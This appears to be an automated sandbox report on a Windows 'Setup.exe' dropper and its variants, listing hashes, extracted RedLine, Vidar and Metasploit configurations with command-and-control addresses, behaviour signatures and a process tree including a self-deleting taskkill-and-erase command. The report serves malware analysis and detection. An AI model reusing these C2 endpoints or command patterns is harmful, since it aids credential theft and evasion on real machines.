Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
154s -
max time network
1813s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
24.08
95.181.172.100:55640
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral32/memory/2216-399-0x0000000005250000-0x0000000005B76000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5948 304 rundll32.exe 138 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4108 304 rundll32.exe 138 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8144 304 rundll32.exe 138 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9400 304 rundll32.exe 138 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral32/files/0x000100000001ab85-138.dat family_redline behavioral32/files/0x000100000001ab85-182.dat family_redline behavioral32/memory/4812-264-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral32/memory/4908-275-0x000000000041A616-mapping.dmp family_redline behavioral32/memory/4908-272-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral32/memory/4812-267-0x000000000041A76A-mapping.dmp family_redline behavioral32/memory/3508-491-0x000000000041A61A-mapping.dmp family_redline -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral32/memory/3988-365-0x0000000004970000-0x0000000004A0D000-memory.dmp family_vidar behavioral32/memory/3988-382-0x0000000000400000-0x0000000002D1A000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
pid Process 2892 PNlW9Ynw3hrZheQ4fo5oW07r.exe 2904 KkjvE1gBgcSCLctD3FV4gePo.exe 2636 RImJ90i5WyDa_CR9AVZ5npoI.exe 3380 IQp3iOsR3ggTRvROqmeyfMXx.exe 2288 hhWSowo56ICH5Ct16_uDvViF.exe 2756 I99YptBkWxx9pT4JWVCVfIPO.exe 2932 lW0NRBt72kgGuEXqrfYFIJs1.exe 1360 haQopfVIAQr4qq3pQM_0dwtd.exe 500 cBnlvjc97Cmm56_CDemU1Bs1.exe 2184 rbBrlVBwQcaFGA2vxwRmNn5Q.exe 3816 0HZX1v2M4nK4m4r3L_ILsrOi.exe 2216 r8wK8miXIew0GxPB_M3SqNYt.exe 3812 yCWmc1V30o6dlR0xii5erM2K.exe 2804 6CTbj_PvPVwmC0UoxinDcC8i.exe 8 22oiVanbooF8DL_R5SnjI4Vq.exe 2156 cyBfhO12Wuh6n7rG4xU4H8tZ.exe 3988 7bafckZ5rtgPIZJG86zfVdHi.exe 3748 LyMjURO0cyxMA3cQmPaS6KGJ.exe 2716 7u_7a9fRpOJFj9_7K6FfqV7A.exe 2760 mwEOhluSw0mfDbqmPZCcZKms.exe 3284 mah7ahHqr_vjx0vrQ37YCHAD.exe 2652 4tyIUkvpHdBTXMfrt6Q9KPl8.exe 4128 fTYCIa4eOgEhVJfKlKbYVDKT.exe 4460 ERJcaxlU8Orr_cChsgDRUkUD.exe 4472 customer3.exe 4512 md8_8eus.exe 4580 jooyu.exe 4760 ERJcaxlU8Orr_cChsgDRUkUD.tmp 4812 lW0NRBt72kgGuEXqrfYFIJs1.exe 4908 hhWSowo56ICH5Ct16_uDvViF.exe 4228 fTYCIa4eOgEhVJfKlKbYVDKT.exe 4968 WO~L~OYJWS8EVL1.eXe 1356 4413775.exe 1128 jfiag3g_gg.exe 1268 4221790.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7u_7a9fRpOJFj9_7K6FfqV7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7u_7a9fRpOJFj9_7K6FfqV7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cyBfhO12Wuh6n7rG4xU4H8tZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cyBfhO12Wuh6n7rG4xU4H8tZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0HZX1v2M4nK4m4r3L_ILsrOi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0HZX1v2M4nK4m4r3L_ILsrOi.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup.exe -
Loads dropped DLL 3 IoCs
pid Process 2904 KkjvE1gBgcSCLctD3FV4gePo.exe 4760 ERJcaxlU8Orr_cChsgDRUkUD.tmp 4760 ERJcaxlU8Orr_cChsgDRUkUD.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral32/files/0x000100000001ab94-150.dat themida behavioral32/files/0x000100000001ab91-146.dat themida behavioral32/files/0x000100000001ab9a-192.dat themida behavioral32/files/0x000100000001aba2-196.dat themida behavioral32/files/0x000100000001ab91-183.dat themida behavioral32/files/0x000100000001ab94-180.dat themida behavioral32/files/0x000100000001aba2-166.dat themida behavioral32/files/0x000100000001ab9a-161.dat themida behavioral32/memory/3812-252-0x00000000008E0000-0x00000000008E1000-memory.dmp themida behavioral32/memory/2156-260-0x0000000000A90000-0x0000000000A91000-memory.dmp themida behavioral32/memory/2716-262-0x0000000000350000-0x0000000000351000-memory.dmp themida behavioral32/memory/3816-251-0x0000000000980000-0x0000000000981000-memory.dmp themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0HZX1v2M4nK4m4r3L_ILsrOi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cyBfhO12Wuh6n7rG4xU4H8tZ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7u_7a9fRpOJFj9_7K6FfqV7A.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 263 ipinfo.io 410 ipinfo.io 427 ip-api.com 581 geoiptool.com 635 freegeoip.app 636 freegeoip.app 29 ipinfo.io 262 ipinfo.io 222 freegeoip.app 242 ipinfo.io 244 ipinfo.io 208 freegeoip.app 211 freegeoip.app 206 freegeoip.app 236 ipinfo.io 413 ipinfo.io 30 ipinfo.io 163 ipinfo.io 150 ip-api.com 160 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3812 yCWmc1V30o6dlR0xii5erM2K.exe 3816 0HZX1v2M4nK4m4r3L_ILsrOi.exe 2156 cyBfhO12Wuh6n7rG4xU4H8tZ.exe 2716 7u_7a9fRpOJFj9_7K6FfqV7A.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2932 set thread context of 4812 2932 lW0NRBt72kgGuEXqrfYFIJs1.exe 118 PID 2288 set thread context of 4908 2288 hhWSowo56ICH5Ct16_uDvViF.exe 119 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 4tyIUkvpHdBTXMfrt6Q9KPl8.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 54 IoCs
pid pid_target Process procid_target 2628 3284 WerFault.exe 106 3424 3284 WerFault.exe 106 5000 3284 WerFault.exe 106 5468 3284 WerFault.exe 106 5780 3988 WerFault.exe 95 4444 3988 WerFault.exe 95 6100 2216 WerFault.exe 81 4292 2216 WerFault.exe 81 4348 3988 WerFault.exe 95 4416 2216 WerFault.exe 81 5980 3988 WerFault.exe 95 6080 3284 WerFault.exe 106 3852 3988 WerFault.exe 95 5000 2216 WerFault.exe 81 3488 3988 WerFault.exe 95 3564 2216 WerFault.exe 81 5660 3988 WerFault.exe 95 6356 2216 WerFault.exe 81 6404 3988 WerFault.exe 95 6736 3988 WerFault.exe 95 6828 2216 WerFault.exe 81 6984 3988 WerFault.exe 95 7080 2216 WerFault.exe 81 6528 6112 WerFault.exe 162 4776 6112 WerFault.exe 162 5820 6112 WerFault.exe 162 4556 3988 WerFault.exe 95 7240 6112 WerFault.exe 162 7840 3988 WerFault.exe 95 7880 6112 WerFault.exe 162 7184 6112 WerFault.exe 162 4088 6112 WerFault.exe 162 4656 6896 WerFault.exe 241 8136 6896 WerFault.exe 241 5568 6112 WerFault.exe 162 6932 6896 WerFault.exe 241 6992 5560 WerFault.exe 221 8004 6112 WerFault.exe 162 4260 5632 WerFault.exe 231 7016 5704 WerFault.exe 222 6888 5632 WerFault.exe 231 7372 5704 WerFault.exe 222 4844 6112 WerFault.exe 162 4984 5632 WerFault.exe 231 6228 5632 WerFault.exe 231 7504 5704 WerFault.exe 222 8220 5704 WerFault.exe 222 8568 5704 WerFault.exe 222 8804 6112 WerFault.exe 162 8908 5704 WerFault.exe 222 8144 5704 WerFault.exe 222 5860 5632 WerFault.exe 231 8572 6896 WerFault.exe 241 8304 5560 WerFault.exe 221 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10056 schtasks.exe 9528 schtasks.exe 10640 schtasks.exe 6872 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10424 vssadmin.exe 7280 vssadmin.exe -
Kills process with taskkill 8 IoCs
pid Process 1476 taskkill.exe 6276 taskkill.exe 7548 taskkill.exe 4088 taskkill.exe 7404 taskkill.exe 8408 taskkill.exe 5880 taskkill.exe 4868 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 7604 PING.EXE 6852 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 167 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 235 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 239 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 240 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 412 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 419 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 504 Setup.exe 504 Setup.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 2628 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe 3424 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2904 KkjvE1gBgcSCLctD3FV4gePo.exe Token: SeDebugPrivilege 2184 rbBrlVBwQcaFGA2vxwRmNn5Q.exe Token: SeDebugPrivilege 3380 IQp3iOsR3ggTRvROqmeyfMXx.exe Token: SeDebugPrivilege 4812 lW0NRBt72kgGuEXqrfYFIJs1.exe Token: SeRestorePrivilege 2628 WerFault.exe Token: SeBackupPrivilege 2628 WerFault.exe Token: SeDebugPrivilege 2628 WerFault.exe Token: SeDebugPrivilege 2756 I99YptBkWxx9pT4JWVCVfIPO.exe Token: SeDebugPrivilege 3816 0HZX1v2M4nK4m4r3L_ILsrOi.exe Token: SeDebugPrivilege 4908 hhWSowo56ICH5Ct16_uDvViF.exe Token: SeDebugPrivilege 2716 7u_7a9fRpOJFj9_7K6FfqV7A.exe Token: SeDebugPrivilege 2156 cyBfhO12Wuh6n7rG4xU4H8tZ.exe Token: SeDebugPrivilege 3424 WerFault.exe Token: SeDebugPrivilege 1476 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4760 ERJcaxlU8Orr_cChsgDRUkUD.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 504 wrote to memory of 2892 504 Setup.exe 92 PID 504 wrote to memory of 2892 504 Setup.exe 92 PID 504 wrote to memory of 2892 504 Setup.exe 92 PID 504 wrote to memory of 2636 504 Setup.exe 89 PID 504 wrote to memory of 2636 504 Setup.exe 89 PID 504 wrote to memory of 2904 504 Setup.exe 91 PID 504 wrote to memory of 2904 504 Setup.exe 91 PID 504 wrote to memory of 3380 504 Setup.exe 90 PID 504 wrote to memory of 3380 504 Setup.exe 90 PID 504 wrote to memory of 2932 504 Setup.exe 87 PID 504 wrote to memory of 2932 504 Setup.exe 87 PID 504 wrote to memory of 2932 504 Setup.exe 87 PID 504 wrote to memory of 2288 504 Setup.exe 88 PID 504 wrote to memory of 2288 504 Setup.exe 88 PID 504 wrote to memory of 2288 504 Setup.exe 88 PID 504 wrote to memory of 2756 504 Setup.exe 86 PID 504 wrote to memory of 2756 504 Setup.exe 86 PID 504 wrote to memory of 2756 504 Setup.exe 86 PID 504 wrote to memory of 1360 504 Setup.exe 93 PID 504 wrote to memory of 1360 504 Setup.exe 93 PID 504 wrote to memory of 1360 504 Setup.exe 93 PID 504 wrote to memory of 2184 504 Setup.exe 85 PID 504 wrote to memory of 2184 504 Setup.exe 85 PID 504 wrote to memory of 2184 504 Setup.exe 85 PID 504 wrote to memory of 500 504 Setup.exe 84 PID 504 wrote to memory of 500 504 Setup.exe 84 PID 504 wrote to memory of 500 504 Setup.exe 84 PID 504 wrote to memory of 3816 504 Setup.exe 83 PID 504 wrote to memory of 3816 504 Setup.exe 83 PID 504 wrote to memory of 3816 504 Setup.exe 83 PID 504 wrote to memory of 3812 504 Setup.exe 82 PID 504 wrote to memory of 3812 504 Setup.exe 82 PID 504 wrote to memory of 3812 504 Setup.exe 82 PID 504 wrote to memory of 2216 504 Setup.exe 81 PID 504 wrote to memory of 2216 504 Setup.exe 81 PID 504 wrote to memory of 2216 504 Setup.exe 81 PID 504 wrote to memory of 2804 504 Setup.exe 80 PID 504 wrote to memory of 2804 504 Setup.exe 80 PID 504 wrote to memory of 2804 504 Setup.exe 80 PID 504 wrote to memory of 8 504 Setup.exe 79 PID 504 wrote to memory of 8 504 Setup.exe 79 PID 504 wrote to memory of 8 504 Setup.exe 79 PID 504 wrote to memory of 2156 504 Setup.exe 99 PID 504 wrote to memory of 2156 504 Setup.exe 99 PID 504 wrote to memory of 2156 504 Setup.exe 99 PID 504 wrote to memory of 3988 504 Setup.exe 95 PID 504 wrote to memory of 3988 504 Setup.exe 95 PID 504 wrote to memory of 3988 504 Setup.exe 95 PID 504 wrote to memory of 3748 504 Setup.exe 94 PID 504 wrote to memory of 3748 504 Setup.exe 94 PID 504 wrote to memory of 3748 504 Setup.exe 94 PID 504 wrote to memory of 2760 504 Setup.exe 108 PID 504 wrote to memory of 2760 504 Setup.exe 108 PID 504 wrote to memory of 2760 504 Setup.exe 108 PID 504 wrote to memory of 2716 504 Setup.exe 107 PID 504 wrote to memory of 2716 504 Setup.exe 107 PID 504 wrote to memory of 2716 504 Setup.exe 107 PID 504 wrote to memory of 3284 504 Setup.exe 106 PID 504 wrote to memory of 3284 504 Setup.exe 106 PID 504 wrote to memory of 3284 504 Setup.exe 106 PID 504 wrote to memory of 2652 504 Setup.exe 105 PID 504 wrote to memory of 2652 504 Setup.exe 105 PID 504 wrote to memory of 2652 504 Setup.exe 105 PID 504 wrote to memory of 4128 504 Setup.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"2⤵
- Executes dropped EXE
PID:8 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1971958712.exe"3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\1971958712.exe"C:\Users\Admin\AppData\Local\Temp\1971958712.exe"4⤵PID:4804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9265678534.exe"3⤵PID:6708
-
C:\Users\Admin\AppData\Local\Temp\9265678534.exe"C:\Users\Admin\AppData\Local\Temp\9265678534.exe"4⤵PID:5560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 7725⤵
- Program crash
PID:6992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 8685⤵
- Program crash
PID:8304
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f & erase "C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe" & exit3⤵PID:1556
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f4⤵
- Kills process with taskkill
PID:7548
-
-
-
-
C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"2⤵
- Executes dropped EXE
PID:2804
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"2⤵
- Executes dropped EXE
PID:2216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 3883⤵
- Program crash
PID:6100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 3763⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 4043⤵
- Program crash
PID:4416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 6283⤵
- Program crash
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7083⤵
- Program crash
PID:3564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7123⤵
- Program crash
PID:6356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7603⤵
- Program crash
PID:6828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 6323⤵
- Program crash
PID:7080
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"3⤵PID:10136
-
-
